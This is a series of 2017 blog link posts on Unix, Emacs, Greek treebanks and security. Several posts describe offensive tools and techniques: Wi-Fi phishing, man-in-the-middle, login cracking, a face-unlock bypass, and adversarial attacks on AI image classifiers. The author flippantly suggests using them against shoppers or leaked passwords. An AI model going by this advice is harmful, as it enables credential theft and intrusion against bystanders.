Another Word For It Patrick Durusau on Topic Maps and Semantic Diversity

December 24, 2017

Unix Magnificent Seven + Bash (MorphGNT)

Filed under: Bible,Greek,Linux OS — Patrick Durusau @ 3:16 pm

Some Unix Command Line Exercises Using MorphGNT by James Tauber.

From the post:

I thought I’d help a friend learn some basic Unix command line (although pretty comprehensive for this tpe of work) with some practical graded exercises using MorphGNT. It worked out well so I thought I’d share in case they are useful to others.

The point here is not to actually teach how to use bash or commands like grep, awk, cut, sort, uniq, head or wc but rather to motivate their use in a gradual fashion with real use cases and to structure what to actually look up when learning how to use them.

This little set of commands has served me well for over twenty years working with MorphGNT in its various iterations (although I obviously switch to Python for anything more complex).
… (emphasis in original)

Great demonstration of what the Unix Magnificent Seven + bash can accomplish.

Oh, MorphGNT, Linguistic Databases and Python Tools for the Greek New Testament.

Next victim of your Unix text hacking skills?

A/B Tests for Disinformation/Fake News?

Filed under: A/B Tests,Fake News,Journalism,News — Patrick Durusau @ 2:59 pm

Digital Shadows says it:

Digital Shadows monitors, manages, and remediates digital risk across the widest range of sources on the visible, deep, and dark web to protect your organization.

It recently published The Business of Disinformation: A Taxonomy – Fake news is more than a political battlecry.

It’s not long, fourteen (14) pages and it has the usual claims about disinformation and fake news you know from other sources.

However, for all its breathless prose and promotion of its solution, there is no mention of any A/B tests to show that disinformation or fake news is effective in general or against you in particular.

The value proposition offered by Digital Shadows is everyone says disinformation and fake news are important, therefore spend money with us to combat it.

Alien abduction would be important but I won’t be buying alien abduction insurance or protection services any time soon.

Proof of the effectiveness of disinformation and fake news is on a par with proof of alien abduction.

Anything possible but spending money or creating policies requires proof.

Where’s the proof for the effectiveness of disinformation or fake news? No proof, no spending. Yes?

December 21, 2017

SMB – 1 billion vulnerable machines

Filed under: Cybersecurity,Microsoft,Security — Patrick Durusau @ 8:10 pm

An Introduction to SMB for Network Security Analysts by Nate “Doomsday” Marx.

Of all the common protocols a new analyst encounters, perhaps none is quite as impenetrable as Server Message Block (SMB). Its enormous size, sparse documentation, and wide variety of uses can make it one of the most intimidating protocols for junior analysts to learn. But SMB is vitally important: lateral movement in Windows Active Directory environments can be the difference between a minor and a catastrophic breach, and almost all publicly available techniques for this movement involve SMB in some way. While there are numerous guides to certain aspects of SMB available, I found a dearth of material that was accessible, thorough, and targeted towards network analysis. The goal of this guide is to explain this confusing protocol in a way that helps new analysts immediately start threat hunting with it in their networks, ignoring the irrelevant minutiae that seem to form the core of most SMB primers and focusing instead on the kinds of threats an analyst is most likely to see. This guide necessarily sacrifices completeness for accessibility: further in-depth reading is provided in footnotes. There are numerous simplifications throughout to make the basic operation of the protocol more clear; the fact that they are simplifications will not always be highlighted. Lastly, since this guide is an attempt to explain the SMB protocol from a network perspective, the discussion of host based information (windows logs, for example) has been omitted.

It never occurred to me that NTLM, introduced with Windows NT in 1993, is still supported in the latest version of Windows.

That means a deep knowledge of SMB pushes systems vulnerable to you almost north of 1 billion.

How’s that for a line in your CV?

Keeper Security – Beyond Boo-Hooing Over Security Bullies

Filed under: Cybersecurity,Free Speech,Security — Patrick Durusau @ 8:06 pm

Security firm Keeper sues news reporter over vulnerability story by Zack Whittaker.

From the post:

Keeper, a password manager software maker, has filed a lawsuit against a news reporter and its publication after a story was posted reporting a vulnerability disclosure.

Dan Goodin, security editor at Ars Technica, was named defendant in a suit filed Tuesday by Chicago-based Keeper Security, which accused Goodin of “false and misleading statements” about the company’s password manager.

Goodin’s story, posted December 15, cited Google security researcher Tavis Ormandy, who said in a vulnerability disclosure report he posted a day earlier that a security flaw in Keeper allowed “any website to steal any password” through the password manager’s browser extension.

Goodin was one of the first to cover news of the vulnerability disclosure. He wrote that the password manager was bundled in some versions of Windows 10. When Ormandy tested the bundled password manager, he found a password stealing bug that was nearly identical to one he previously discovered in 2016.

Ormandy also posted a proof-of-concept exploit for the new vulnerability.

I’ll spare you the boo-hooing over Keeper Security‘s attempt to bully Dan Goodin and Ars Technica.

Social media criticism is like the vice-presidency, it’s not worth a warm bucket of piss.

What the hand-wringers over the bullying of Dan Goodin and Ars Technica fail to mention is your ability to no longer use Keeper Security. Not a word.

In The Best Password Managers of 2018, I see ten (10) top password managers, three of which are rated as equal to or better than Keeper Security.

Sadly I don’t use Keeper Security so I can’t send tweet #1: I refuse to use/renew Keeper Security until it abandons persecution of @dangoodin001 and @arstechnica, plus pays their legal fees.

I’m left with tweet #2: I refuse to consider using Keeper Security until it abandons persecution of @dangoodin001 and @arstechnica, plus pays their legal fees.

Choose tweet 1 or 2, ask your friends to take action, and to retweet.

Emacs X Window Manager

Filed under: Emacs,Linux OS — Patrick Durusau @ 8:02 pm

Emacs X Window Manager by Chris Feng.

From the webpage:

EXWM (Emacs X Window Manager) is a full-featured tiling X window manager for Emacs built on top of XELB. It features:

  • Fully keyboard-driven operations
  • Hybrid layout modes (tiling & stacking)
  • Dynamic workspace support
  • ICCCM/EWMH compliance
  • (Optional) RandR (multi-monitor) support
  • (Optional) Built-in compositing manager
  • (Optional) Built-in system tray

Please check out the screenshots to get an overview of what EXWM is capable of, and the user guide for a detailed explanation of its usage.

Note: If you install EXWM from source, it’s recommended to install XELB also from source (otherwise install both from GNU ELPA).

OK, one screenshot:

BTW, EXWM supports multiple monitors as well.

Enjoy!

Learn to Write Command Line Utilities in R

Filed under: Programming,R — Patrick Durusau @ 7:58 pm

Learn to Write Command Line Utilities in R by Mark Sellors.

From the post:

Do you know some R? Have you ever wanted to write your own command line utilities, but didn’t know where to start? Do you like Harry Potter?

If the answer to these questions is “Yes!”, then you’ve come to the right place. If the answer is “No”, but you have some free time, stick around anyway, it might be fun!

Sellors invokes the tradition of *nix command line tools saying: “The thing that most [command line] tools have in common is that they do a small number of things really well.”

The question to you is: What small things do you want to do really well?

Weird machines, exploitability, and provable unexploitability

Filed under: Computer Science,Cybersecurity,Security,Vocabularies — Patrick Durusau @ 7:54 pm

Weird machines, exploitability, and provable unexploitability by Thomas Dullien (IEEE pre-print, to appear IEEE Transactions on Emerging Topics in Computing)

Abstract:

The concept of exploit is central to computer security, particularly in the context of memory corruptions. Yet, in spite of the centrality of the concept and voluminous descriptions of various exploitation techniques or countermeasures, a good theoretical framework for describing and reasoning about exploitation has not yet been put forward.

A body of concepts and folk theorems exists in the community of exploitation practitioners; unfortunately, these concepts are rarely written down or made sufficiently precise for people outside of this community to benefit from them.

This paper clarifies a number of these concepts, provides a clear definition of exploit, a clear definition of the concept of a weird machine, and how programming of a weird machine leads to exploitation. The papers also shows, somewhat counterintuitively, that it is feasible to design some software in a way that even powerful attackers – with the ability to corrupt memory once – cannot gain an advantage.

The approach in this paper is focused on memory corruptions. While it can be applied to many security vulnerabilities introduced by other programming mistakes, it does not address side channel attacks, protocol weaknesses, or security problems that are present by design.

A common vocabulary to bridge the gap between ‘Exploit practitioners’ (EPs) and academic researchers. Whether it will in fact bridge that gap remains to be seen. Even the attempt will prove to be useful.

Tracing the use/propagation of Dullien’s vocabulary across Google’s Project Zero reports and papers would provide a unique data set on the spread (or not) of a new vocabulary in computer science.

Not to mention being a way to map back into earlier literature with the newer vocabulary, via a topic map.

BTW, Dullien’s statement “is is feasible to design some software in a way that even powerful attackers … cannot gain an advantage,” is speculation and should not dampen your holiday spirits. (I root for the hare and not the hounds as a rule.)

Nine Kinds of Ancient Greek Treebanks

Filed under: Bible,Greek,Linguistics — Patrick Durusau @ 7:50 pm

Nine Kinds of Ancient Greek Treebanks by Jonathan Robie.

When I blog or speak about Greek treebanks, I frequently refer to one or more of the treebanks that are currently available. Few people realize how many treebanks exist for ancient Greek, and even fewer have ever seriously looked at more than one. I do not know of a web page that lists all of the ones I know of, so I thought it would be helpful to list them in one blog post, providing basic information about each.

So here is a catalog of treebanks for ancient Greek.

Most readers of this blog know Jonathan Robie from his work on XQuery and XPath, two of the XML projects that have benefited from his leadership.

What readers may not know is that Jonathan originated both b-greek (Biblical Greek Forum, est. 1992) and b-hebrew (Biblical Hebrew Forum, est. 1997). Those are not typos, b-greek began in 1992 and b-hebrew in 1997. (I checked the archives before posting.)

Not content to be the origin and maintainer of two of the standard discussion forums for biblical languages, Jonathan has undertaken to produce high quality open data for serious Bible students and professional scholars.

Texts in multiple treebanks, such as the Greek NT, make a great use case for display and analysis of overlapping trees.

December 20, 2017

Violating TCP

Filed under: Cybersecurity,Networks — Patrick Durusau @ 8:18 pm

This is strictly a violation of the TCP specification by Marek Majkowski.

From the post:

I was asked to debug another weird issue on our network. Apparently every now and then a connection going through CloudFlare would time out with 522 HTTP error.

522 error on CloudFlare indicates a connection issue between our edge server and the origin server. Most often the blame is on the origin server side – the origin server is slow, offline or encountering high packet loss. Less often the problem is on our side.

In the case I was debugging it was neither. The internet connectivity between CloudFlare and origin was perfect. No packet loss, flat latency. So why did we see a 522 error?

The root cause of this issue was pretty complex. After a lot of debugging we identified an important symptom: sometimes, once in thousands of runs, our test program failed to establish a connection between two daemons on the same machine. To be precise, an NGINX instance was trying to establish a TCP connection to our internal acceleration service on localhost. This failed with a timeout error.

It’s unlikely that you will encounter this issue but Majkowski’s debugging of it is a great story.

It also illustrates how deep the foundations of an error, bug or vulnerability may lie.

Is it a vehicle? A helicopter? No, it’s a rifle! Messing with Machine Learning

Filed under: Classifier,Image Recognition,Image Understanding,Machine Learning — Patrick Durusau @ 8:14 pm

Partial Information Attacks on Real-world AI

From the post:

We’ve developed a query-efficient approach for finding adversarial examples for black-box machine learning classifiers. We can even produce adversarial examples in the partial information black-box setting, where the attacker only gets access to “scores” for a small number of likely classes, as is the case with commercial services such as Google Cloud Vision (GCV).

The post is a quick read (est. 2 minutes) with references but you really need to see:

Query-efficient Black-box Adversarial Examples by Andrew Ilyas, Logan Engstrom, Anish Athalye, Jessy Lin.

Abstract:

Current neural network-based image classifiers are susceptible to adversarial examples, even in the black-box setting, where the attacker is limited to query access without access to gradients. Previous methods — substitute networks and coordinate-based finite-difference methods — are either unreliable or query-inefficient, making these methods impractical for certain problems.

We introduce a new method for reliably generating adversarial examples under more restricted, practical black-box threat models. First, we apply natural evolution strategies to perform black-box attacks using two to three orders of magnitude fewer queries than previous methods. Second, we introduce a new algorithm to perform targeted adversarial attacks in the partial-information setting, where the attacker only has access to a limited number of target classes. Using these techniques, we successfully perform the first targeted adversarial attack against a commercially deployed machine learning system, the Google Cloud Vision API, in the partial information setting.

The paper contains this example:

How does it go? Seeing is believing!

Defeating image classifiers will be an exploding market for jewel merchants, bankers, diplomats, and others with reasons to avoid being captured by modern image classification systems.

Offensive Security Conference – February 12-17 2018 // Berlin

Filed under: Conferences,Cybersecurity — Patrick Durusau @ 8:09 pm

Offensive Security Conference – February 12-17 2018 // Berlin

If you haven’t already registered/made travel arrangements, perhaps the speakers list will hurry you along.

While you wait for the conference, can you match the author(s) to the papers based on title alone? Several papers have multiple authors, but which ones?

Enjoy!

What’s in Your Wallet? Photo Defeats Windows 10 Facial Recognition

Filed under: Cybersecurity,Security — Patrick Durusau @ 11:19 am

It took more than a wallet-sized photo, but until patched, the Window 10 Hello facial recognition feature accepted a near IR printed (340×340 pixel) image to access a Windows device.

Catalin Cimpanu has the details at: Windows 10 Facial Recognition Feature Can Be Bypassed with a Photo.

The disturbing line in Cipanu’s report reads:


The feature is not that widespread since not many devices with the necessary hardware, yet when present, it is often used since it’s quite useful at unlocking computers without having users type in long passwords.

When hardware support for Windows Hello spreads, you can imagine its default use in corporate and government offices.

The Microsoft patch may defeat a 2-D near IR image but for the future, I’d invest in a 3-D printer with the ability to print in the near IR.

I don’t think your Guy Fawkes mask will work on most Windows devices:

But it might make a useful “cover” for a less common mask. If security forces have to search every Guy Fawkes mask, some Guy Fawkes+ masks are bound to slip through. Statistically speaking.

December 19, 2017

Was that Stevie Nicks or Tacotron 2.0? ML Singing in 2018

Filed under: Machine Learning,Music,Neural Networks — Patrick Durusau @ 7:15 pm

[S]amim @samim tweeted:

In 2018, machine learning based singing vocal synthesisers will go mainstream. It will transform the music industry beyond recognition.

With these two links:

Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions by Jonathan Shen, et al.

Abstract:

This paper describes Tacotron 2, a neural network architecture for speech synthesis directly from text. The system is composed of a recurrent sequence-to-sequence feature prediction network that maps character embeddings to mel-scale spectrograms, followed by a modified WaveNet model acting as a vocoder to synthesize timedomain waveforms from those spectrograms. Our model achieves a mean opinion score (MOS) of 4.53 comparable to a MOS of 4.58 for professionally recorded speech. To validate our design choices, we present ablation studies of key components of our system and evaluate the impact of using mel spectrograms as the input to WaveNet instead of linguistic, duration, and F0 features. We further demonstrate that using a compact acoustic intermediate representation enables significant simplification of the WaveNet architecture.

and,

Audio samples from “Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions”

Try the samples before dismissing the prediction of machine learning singing in 2018.

I have a different question:

What is in your test set for ML singing?

Among my top picks, Stevie Nicks, Janis Joplin, and of course, Grace Slick.

Practicing Vulnerability Hunting in Programming Languages for Music

Filed under: Cybersecurity,Music,Programming,Security — Patrick Durusau @ 5:38 pm

If you watched Natalie Silvanovich‘s presentation on mining the JavaScript standard for vulnerabilities, the tweet from Computer Science @CompSciFact pointing to Programming Languages Used for Music must have you drooling like one of Pavlov‘s dogs.

I count one hundred and forty-seven (147) languages, of varying degrees of popularity, none of which has gotten the security review of ECMA-262. (Michael Aranda wades through terminology/naming issues for ECMAScript vs. JavaScript at: What’s the difference between JavaScript and ECMAScript?.)

Good hunting!

December 16, 2017

Hadoop® v3.0.0, Pre-1990 Documentation Practice

Filed under: BigData,Documentation,Hadoop — Patrick Durusau @ 9:15 pm

Apache® Hadoop® v3.0.0 General Availability

From the post:

Ubiquitous Open Source enterprise framework maintains decade-long leading role in $100B annual Big Data market

The Apache Software Foundation (ASF), the all-volunteer developers, stewards, and incubators of more than 350 Open Source projects and initiatives, today announced Apache® Hadoop® v3.0.0, the latest version of the Open Source software framework for reliable, scalable, distributed computing.

Over the past decade, Apache Hadoop has become ubiquitous within the greater Big Data ecosystem by enabling firms to run and manage data applications on large hardware clusters in a distributed computing environment.

"This latest release unlocks several years of development from the Apache community," said Chris Douglas, Vice President of Apache Hadoop. "The platform continues to evolve with hardware trends and to accommodate new workloads beyond batch analytics, particularly real-time queries and long-running services. At the same time, our Open Source contributors have adapted Apache Hadoop to a wide range of deployment environments, including the Cloud."

"Hadoop 3 is a major milestone for the project, and our biggest release ever," said Andrew Wang, Apache Hadoop 3 release manager. "It represents the combined efforts of hundreds of contributors over the five years since Hadoop 2. I'm looking forward to how our users will benefit from new features in the release that improve the efficiency, scalability, and reliability of the platform."

Apache Hadoop 3.0.0 highlights include:

  • HDFS erasure coding —halves the storage cost of HDFS while also improving data durability;
  • YARN Timeline Service v.2 (preview) —improves the scalability, reliability, and usability of the Timeline Service;
  • YARN resource types —enables scheduling of additional resources, such as disks and GPUs, for better integration with machine learning and container workloads;
  • Federation of YARN and HDFS subclusters transparently scales Hadoop to tens of thousands of machines;
  • Opportunistic container execution improves resource utilization and increases task throughput for short-lived containers. In addition to its traditional, central scheduler, YARN also supports distributed scheduling of opportunistic containers; and 
  • Improved capabilities and performance improvements for cloud storage systems such as Amazon S3 (S3Guard), Microsoft Azure Data Lake, and Aliyun Object Storage System.

… (emphasis in original)

Ah, the Hadoop link.

Do you find it odd use of the leader in the “$100B annual Big Data market” is documented by string comments in scripts and code?

Do you think non-technical management benefits from the documentation so captured?

Or that documentation for field names, routines, etc., can be easily extracted?

If software is maturing in a $100B market, shouldn’t it have mature documentation capabilities as well?

Standard Driven Bugs – Must Watch Presentation For Standards Geeks

Filed under: Cybersecurity,Security,Standards — Patrick Durusau @ 4:36 pm

From the description:

Web standards are ever-evolving and determine what browsers can do. But new features can also lead to new vulnerabilities as they exercise existing functionality in new and unexpected ways. This talk discusses some of the more interesting and unusual features of JavaScript, and how they lead to bugs in a variety of software, including Adobe Flash, Chrome, Microsoft Edge and Safari.

Natalie Silvanovich is a security researcher at Google Project Zero.

Whether you are looking for origin of bugs in a standard or playing the long game, creating the origin of bugs in standards (NSA for example), this is a must watch video!

A transcript with CVE links, etc, would be especially useful.

Russians? Nation State? Dorm Room? Mirai Botnet Facts

Filed under: Cybersecurity,Government,Journalism,News,Reporting — Patrick Durusau @ 3:40 pm

How a Dorm Room Minecraft Scam Brought Down the Internet by Garett M. Graff.

From the post:

The most dramatic cybersecurity story of 2016 came to a quiet conclusion Friday in an Anchorage courtroom, as three young American computer savants pleaded guilty to masterminding an unprecedented botnet—powered by unsecured internet-of-things devices like security cameras and wireless routers—that unleashed sweeping attacks on key internet services around the globe last fall. What drove them wasn’t anarchist politics or shadowy ties to a nation-state. It was Minecraft.

Graff’s account is mandatory reading for:

  • Hackers who want to avoid discovery by the FBI
  • Journalists who want to avoid false and/or misleading claims about cyberattacks
  • Manufacturers who want to avoid producing insecure devices (a very small number)
  • Readers who interested in how the Mirai botnet hype played out

Enjoy!

“It is more blessed to give than to receive.” Mallers, WiFiPhisher Can Help You With That!

Filed under: Cybersecurity,Security — Patrick Durusau @ 11:25 am

Acts 20:35 records Jesus as saying, in part: “It is more blessed to give than to receive.”

Mall shoppers may honor that admonition without their knowledge (or consent).

Automated WPA Phishing Attacks: WiFiPhisher

From the webpage:

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Security advice for mallers:

  • Go hard copy, shop with cash/checks.
  • Leave all wifi devices at home, not in your car, at home.

Otherwise, you may have a very blessed holiday shopping experience.

Statistics vs. Machine Learning Dictionary (flat text vs. topic map)

Filed under: Dictionary,Machine Learning,Statistics,Topic Maps — Patrick Durusau @ 10:43 am

Data science terminology (UBC Master of Data Science)

From the webpage:

About this document

This document is intended to help students navigate the large amount of jargon, terminology, and acronyms encountered in the MDS program and beyond. There is also an accompanying blog post.

Stat-ML dictionary

This section covers terms that have different meanings in different contexts, specifically statistics vs. machine learning (ML).
… (emphasis in original)

Gasp! You don’t mean that the same words have different meanings in machine learning and statistics!

Even more shocking, some words/acronyms, have the same meaning!

Never fear, a human reader can use this document to distinguish the usages.

Automated processors, not so much.

If these terms were treated as occurrences of topics, where the topics had the respective scopes of statistics and machine-learning, then for any scoped document, an enhanced view with the correct definition for the unsteady reader could be supplied.

Static markup of legacy documents is not required as annotations can be added as a document is streamed to a reader. Opening the potential, of course, for different annotations depending upon the skill and interest of the reader.

If for each term/subject, more properties than the scope of statistics or machine-learning or both were supplied, users of the topic map could search on those properties to match terms not included here. Such as which type of bias (in statistics) does bias mean in your paper? A casually written Wikipedia article reports twelve and with refinement, the number could be higher.

Flat text is far easier to write than a topic map but tasks every reader with re-discovering the distinctions already known to the author of the document.

Imagine your office, department, agency’s vocabulary and its definitions captured and then used to annotate internal or external documentation for your staff.

Instead of very new staffer asking (hopefully), what do we mean by (your common term), the definition appears with a mouse-over in a document.

Are you capturing the soft knowledge of your staff?

Evil Foca [Encourage Upgrades from Windows XP]

Filed under: Cybersecurity,Security — Patrick Durusau @ 10:04 am

Network Security Testing: Evil Foca

From the webpage:

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

The tool is capable of carrying out various attacks such as:

  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.

Requirements

  • Windows XP or later.

ATMs and users running Windows XP are justification for possessing Windows XP.

But upgrading from Windows XP as an operations platform should be encouraged. For any purpose.

Yes?

Otherwise, what’s next? A luggable computer for your next assignment?

December 15, 2017

getExploit (utility)

Filed under: Cybersecurity,Security — Patrick Durusau @ 9:38 pm

getExploit

From the webpage:

Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux, but in difference this python script will have provide more flexibility at search and download time.

Looks useful, modulo the added risk of a local copy.

Yeti (You Are What You Record)

Filed under: Cybersecurity,Security — Patrick Durusau @ 9:09 pm

Open Distributed Threat Intelligence: Yeti

From the webpage:

Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository. Yeti will also automatically enrich observables (e.g. resolve domains, geolocate IPs) so that you don’t have to. Yeti provides an interface for humans (shiny Bootstrap-based UI) and one for machines (web API) so that your other tools can talk nicely to it.

Yeti was born out of frustration of having to answer the question “where have I seen this artifact before?” or Googling shady domains to tie them to a malware family.

In a nutshell, Yeti allows you to:

  • Submit observables and get a pretty good guess on the nature of the threat.
  • Inversely, focus on a threat and quickly list all TTPs, Observables, and associated malware.
  • Let responders skip the “Google the artifact” stage of incident response.
  • Let analysts focus on adding intelligence rather than worrying about machine-readable export formats.
  • Visualize relationship graphs between different threats.

This is done by:

  • Collecting and processing observables from a wide array of different sources (MISP instances, malware trackers, XML feeds, JSON feeds…)
  • Providing a web API to automate queries (think incident management platform) and enrichment (think malware sandbox).
  • Export the data in user-defined formats so that they can be ingested by third-party applications (think blocklists, SIEM).

Yeti sounds like a good tool, but always remember: You Are What You Record.

Innocent activities captured in your Yeti repository could be made to look like plans for criminal activity.

Just a word to the wise.

KubeCon/CloudNativeCon [Breaking Into Clouds]

Filed under: Cloud Computing,Conferences,Cybersecurity,Security — Patrick Durusau @ 8:48 pm

KubeCon/CloudNativeCon just concluded in Austin, Texas with 179 videos now available on YouTube.

A sortable list of presentations: https://kccncna17.sched.com/. How long that will persist isn’t clear.

If you missed Why The Federal Government Warmed Up To Cloud Computing, take a minute to review it now. It’s a promotional piece but the essential take away, government data is moving to the cloud, remains valid.

To detect security failures during migration and post-migration, you will need to know cloud technology better than the average migration tech.

The videos from KubeCon/CloudNativeCon 2017 are a nice starter set in that direction.

Colorized Math Equations [Algorithms?]

Filed under: Algorithms,Examples,Visualization — Patrick Durusau @ 5:13 pm

Colorized Math Equations by Kalid Azad.

From the post:

Years ago, while working on an explanation of the Fourier Transform, I found this diagram:

(source)

Argh! Why aren’t more math concepts introduced this way?

Most ideas aren’t inherently confusing, but their technical description can be (e.g., reading sheet music vs. hearing the song.)

My learning strategy is to find what actually helps when learning a concept, and do more of it. Not the stodgy description in the textbook — what made it click for you?

The checklist of what I need is ADEPT: Analogy, Diagram, Example, Plain-English Definition, and Technical Definition.

Here’s a few reasons I like the colorized equations so much:

  • The plain-English description forces an analogy for the equation. Concepts like “energy”, “path”, “spin” aren’t directly stated in the equation.
  • The colors, text, and equations are themselves a diagram. Our eyes bounce back and forth, reading the equation like a map (not a string of symbols).
  • The technical description — our ultimate goal — is not hidden. We’re not choosing between intuition or technical, it’s intuition for the technical.

Of course, we still need examples to check our understanding, but 4/5 ain’t bad!

Azad includes a LaTeX template that he uses to create colorized math equations.

Consider the potential use of color + explanation for algorithms. Being mindful that use of color presents accessibility issues that will require cleverness on your part.

Another tool for your explanation quiver!

THC-Hydra – Very Fast Network Logon Cracker

Filed under: Cybersecurity,Security — Patrick Durusau @ 3:11 pm

Very Fast Network Logon Cracker: THC-Hydra

From the webpage:

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. This fast, and many will say fastest network logon cracker supports many different services. Deemed ‘The best parallelized login hacker’: for Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support and is part of Nessus.

If you don’t know CyberPunk, they have great graphics:

If you have found the recent 1.4 billion password dump, THC-Hydra is in your near future.

IndonesiaLeaks [Leak early, Leak often]

Filed under: Journalism,News,Reporting — Patrick Durusau @ 11:55 am

IndonesiaLeaks: New Platform for Whistleblowers and Muckrakers

From the post:

Ten media houses and five civil society organizations in Indonesia announced a collaboration this week to form a digital platform for whistleblowers.

IndonesiaLeaks will allow the public a platform to anonymously and securely submit information, documents and data sets related to the public interest. The information received by IndonesiaLeaks will then be vetted and verified for use in investigative reports by the ten affiliated media organizations.

The secure online platform is crucial in Indonesia due to the lack of whistleblower protection schemes. Those who take risks leaking information on offenses happening in their institutions are often prosecuted and intimidated.

“IndonesiaLeaks is designed as a collaborative platform between ten media houses to share tasks, responsibilities and resources, as well as risks,” said Wahyu Dhyatmika, the editor of IndonesiaLeaks member publication Tempo.co, at the platform’s launch in Jakarta on Thursday. “By creating this partnership, we hope the impacts of investigative journalism will be bigger and spread widely.”

A welcome surprise as a hard year for the media draws to a close. The chest pounding antics of the American President aren’t the only woes for the media in 2017, but they have been some of the most visible.

IndonesiaLeaks promises to give the sordid side of government (is there another side?) greater visibility. This collaboration will provide strength in numbers and resources for its participants, furthering their ability to practice investigative journalism.

I don’t read Indonesian but the website is attractive and focuses on the secure submission of documents. I rather like that, clean, focused, and to the point.

The collaboration partners to date:

Support these collaborators and other investigative journalists at every opportunity. You never know when one of their stories will impact your reporting on a frothing, tantrum throwing, press hater closer to the United States.

December 14, 2017

Spatial Microsimulation with R – Public Policy Advocates Take Note

Filed under: Environment,R,Simulations — Patrick Durusau @ 11:28 am

Spatial Microsimulation with R by Robin Lovelace and Morgane Dumont.

Apologies for the long quote below but spatial microsimulation is unfamiliar enough that it merited an introduction in the authors’ own prose.

We have all attended public meetings where developers, polluters, landfill operators, etc., had charts, studies, etc., and the public was armed with, well, its opinions.

Spatial Microsimulation with R can put you in a position to offer alternative analysis, meaningfully ask for data used in other studies, in short, arm yourself with weapons long abused in public policy discussions.

From Chapter 1, 1.2 Motivations:


Imagine a world in which data on companies, households and governments were widely available. Imagine, further, that researchers and decision-makers acting in the public interest had tools enabling them to test and model such data to explore different scenarios of the future. People would be able to make more informed decisions, based on the best available evidence. In this technocratic dreamland pressing problems such as climate change, inequality and poor human health could be solved.

These are the types of real-world issues that we hope the methods in this book will help to address. Spatial microsimulation can provide new insights into complex problems and, ultimately, lead to better decision-making. By shedding new light on existing information, the methods can help shift decision-making processes away from ideological bias and towards evidence-based policy.

The ‘open data’ movement has made many datasets more widely available. However, the dream sketched in the opening paragraph is still far from reality. Researchers typically must work with data that is incomplete or inaccessible. Available datasets often lack the spatial or temporal resolution required to understand complex processes. Publicly available datasets frequently miss key attributes, such as income. Even when high quality data is made available, it can be very difficult for others to check or reproduce results based on them. Strict conditions inhibiting data access and use are aimed at protecting citizen privacy but can also serve to block democratic and enlightened decision making.

The empowering potential of new information is encapsulated in the saying that ‘knowledge is power’. This helps explain why methods such as spatial microsimulation, that help represent the full complexity of reality, are in high demand.

Spatial microsimulation is a growing approach to studying complex issues in the social sciences. It has been used extensively in fields as diverse as transport, health and education (see Chapter ), and many more applications are possible. Fundamental to the approach are approximations of individual level data at high spatial resolution: people allocated to places. This spatial microdata, in one form or another, provides the basis for all spatial microsimulation research.

The purpose of this book is to teach methods for doing (not reading about!) spatial microsimulation. This involves techniques for generating and analysing spatial microdata to get the ‘best of both worlds’ from real individual and geographically-aggregated data. Population synthesis is therefore a key stage in spatial microsimulation: generally real spatial microdata are unavailable due to concerns over data privacy. Typically, synthetic spatial microdatasets are generated by combining aggregated outputs from Census results with individual level data (with little or no geographical information) from surveys that are representative of the population of interest.

The resulting spatial microdata are useful in many situations where individual level and geographically specific processes are in operation. Spatial microsimulation enables modelling and analysis on multiple levels. Spatial microsimulation also overlaps with (and provides useful initial conditions for) agent-based models (see Chapter 12).

Despite its utility, spatial microsimulation is little known outside the fields of human geography and regional science. The methods taught in this book have the potential to be useful in a wide range of applications. Spatial microsimulation has great potential to be applied to new areas for informing public policy. Work of great potential social benefit is already being done using spatial microsimulation in housing, transport and sustainable urban planning. Detailed modelling will clearly be of use for planning for a post-carbon future, one in which we stop burning fossil fuels.

For these reasons there is growing interest in spatial microsimulation. This is due largely to its practical utility in an era of ‘evidence-based policy’ but is also driven by changes in the wider research environment inside and outside of academia. Continued improvements in computers, software and data availability mean the methods are more accessible than ever. It is now possible to simulate the populations of small administrative areas at the individual level almost anywhere in the world. This opens new possibilities for a range of applications, not least policy evaluation.

Still, the meaning of spatial microsimulation is ambiguous for many. This book also aims to clarify what the method entails in practice. Ambiguity surrounding the term seems to arise partly because the methods are inherently complex, operating at multiple levels, and partly due to researchers themselves. Some uses of the term ‘spatial microsimulation’ in the academic literature are unclear as to its meaning; there is much inconsistency about what it means. Worse is work that treats spatial microsimulation as a magical black box that just ‘works’ without any need to describe, or more importantly make reproducible, the methods underlying the black box. This book is therefore also about demystifying spatial microsimulation.

If that wasn’t impressive enough, the authors:


We’ve put Spatial Microsimulation with R on-line because we want to reduce barriers to learning. We’ve made it open source via a GitHub repository because we believe in reproducibility and collaboration. Comments and suggests are most welcome there. If the content of the book helps your research, please cite it (Lovelace and Dumont, 2016).

How awesome is that!

Definitely a model for all of us to emulate!

Twitter Bot Template – If You Can Avoid Twitter Censors

Filed under: Bots,Python,Twitter — Patrick Durusau @ 11:04 am

Twitter Bot Template

From the webpage:

Boilerplate for creating simple, non-interactive twitter bots that post periodically. My comparisons bot, @botaphor, is an example of how I use this template in practice.

This is intended for coders familiar with Python and bash.

If you can avoid Twitter censors (new rules, erratically enforced, a regular “feature”), then this Twitter bot template may interest you.

Make tweet filtering a commercial opportunity and Twitter can drop the cost with no profit center of tweet censorship.

Unlikely because policing other people is such a power turn-on.

Still, this is the season for wishes.

Visual Domain Decathlon

Filed under: Image Recognition,Image Understanding — Patrick Durusau @ 10:34 am

Visual Domain Decathlon

From the webpage:

